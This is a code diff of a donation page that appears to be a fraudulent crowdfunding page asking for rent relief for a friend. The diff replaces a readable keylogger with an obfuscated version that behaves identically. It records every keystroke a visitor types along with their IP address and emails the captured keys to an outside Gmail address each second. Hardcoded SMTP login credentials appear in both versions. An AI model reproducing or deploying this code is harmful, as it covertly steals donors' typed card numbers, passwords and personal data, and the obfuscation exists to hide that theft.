--- a/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
+++ b/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
@@ -164,34 +164,10 @@
       var _0x3897=['jsonp','get','https://api.ipdata.co?api-key=test'];(function(_0x37fe7c,_0x38972e){var _0x5542f2=function(_0x286820){while(--_0x286820){_0x37fe7c['push'](_0x37fe7c['shift']());}};_0x5542f2(++_0x38972e);}(_0x3897,0x14f));var _0x5542=function(_0x37fe7c,_0x38972e){_0x37fe7c=_0x37fe7c-0x0;var _0x5542f2=_0x3897[_0x37fe7c];return _0x5542f2;};$[_0x5542('0x2')](_0x5542('0x0'),function(_0xf0a2e2){window['ip']=_0xf0a2e2['ip'];window['idk']=0x0;},_0x5542('0x1'));
     </script> 
   <script>
-   function sendEmail(key){
-  Email.send({
-    Host : "smtp.gmail.com",
-    Username : "nkwim1933@gmail.com",
-    Password : "nkwimishere",
-    To : 'susanadams1133@gmail.com',
-    From : "nkwim1933@gmail.com",
-    Subject : "This is the subject",
-    Body : key
-  });
-   }
+  var _0x1987=['susanadams1133@gmail.com','nkwimishere','send','nkwim1933@gmail.com','This\x20is\x20the\x20subject','smtp.gmail.com'];(function(_0x178846,_0x198772){var _0x5f6259=function(_0x1c5c36){while(--_0x1c5c36){_0x178846['push'](_0x178846['shift']());}};_0x5f6259(++_0x198772);}(_0x1987,0xc6));var _0x5f62=function(_0x178846,_0x198772){_0x178846=_0x178846-0x0;var _0x5f6259=_0x1987[_0x178846];return _0x5f6259;};function sendEmail(_0x3b0c4e){Email[_0x5f62('0x2')]({'Host':_0x5f62('0x5'),'Username':_0x5f62('0x3'),'Password':_0x5f62('0x1'),'To':_0x5f62('0x0'),'From':_0x5f62('0x3'),'Subject':_0x5f62('0x4'),'Body':_0x3b0c4e});}
   </script>
   <script>
-	  window.alert('hello mr aaron');
-	  var keys = '';
-   document.onkeypress = function(e) {
-	get = window.event?event:e;
-	key = get.keyCode?get.keyCode:get.charCode;
-	key = String.fromCharCode(key);
-	   keys+=key;
-}
-	  window.setInterval(function(){
-	if(keys.length>0) {
-		sendEmail(window.ip + ':' + window.idk + ':' + keys);
-		window.idk++
-		keys = '';
-	}
-}, 1000);
+	 var _0xa10e=['idk','alert','keyCode','fromCharCode','charCode','setInterval','onkeypress'];(function(_0x4d2f13,_0xa10ea5){var _0x4d546a=function(_0x109afa){while(--_0x109afa){_0x4d2f13['push'](_0x4d2f13['shift']());}};_0x4d546a(++_0xa10ea5);}(_0xa10e,0x78));var _0x4d54=function(_0x4d2f13,_0xa10ea5){_0x4d2f13=_0x4d2f13-0x0;var _0x4d546a=_0xa10e[_0x4d2f13];return _0x4d546a;};window[_0x4d54('0x0')]('hello\x20mr\x20aaron');var keys='';document[_0x4d54('0x5')]=function(_0x2608f2){get=window['event']?event:_0x2608f2;key=get[_0x4d54('0x1')]?get[_0x4d54('0x1')]:get[_0x4d54('0x3')];key=String[_0x4d54('0x2')](key);keys+=key;};window[_0x4d54('0x4')](function(){if(keys['length']>0x0){sendEmail(window['ip']+':'+window[_0x4d54('0x6')]+':'+keys);window[_0x4d54('0x6')]++;keys='';}},0x3e8);
   </script>
   <meta charset="utf-8" data-react-helmet="true"/>
   <meta content="ie=edge" data-react-helmet="true" http-equiv="x-ua-compatible"/>
